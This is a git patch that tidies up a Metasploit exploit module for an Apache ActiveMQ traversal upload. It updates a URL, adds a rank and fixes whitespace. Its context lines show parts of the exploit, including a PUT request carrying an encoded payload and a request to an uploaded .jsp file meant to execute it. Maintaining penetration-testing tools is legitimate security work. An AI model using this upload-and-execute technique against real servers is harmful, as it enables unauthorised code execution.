From 2360b0e2ffaff8a2bfc7cede65c274f10b08bf0c Mon Sep 17 00:00:00 2001 From: kalba-security Date: Tue, 4 Feb 2020 13:14:03 +0200 Subject: [PATCH] clean up module using msftidy --- .../windows/http/apache_activemq_traversal_upload.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb index d05e660aa1..516f3f2882 100644 --- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb +++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb @@ -1,9 +1,10 @@ ## -# This module requires Metasploit: http://metasploit.com/download +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'PUT', 'data' => payload.encoded }) - + print_status("Payload sent. Attempting to execute the payload.") res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), @@ -110,4 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::PayloadFailed, "Failed to execute the payload") end end -end \ No newline at end of file +end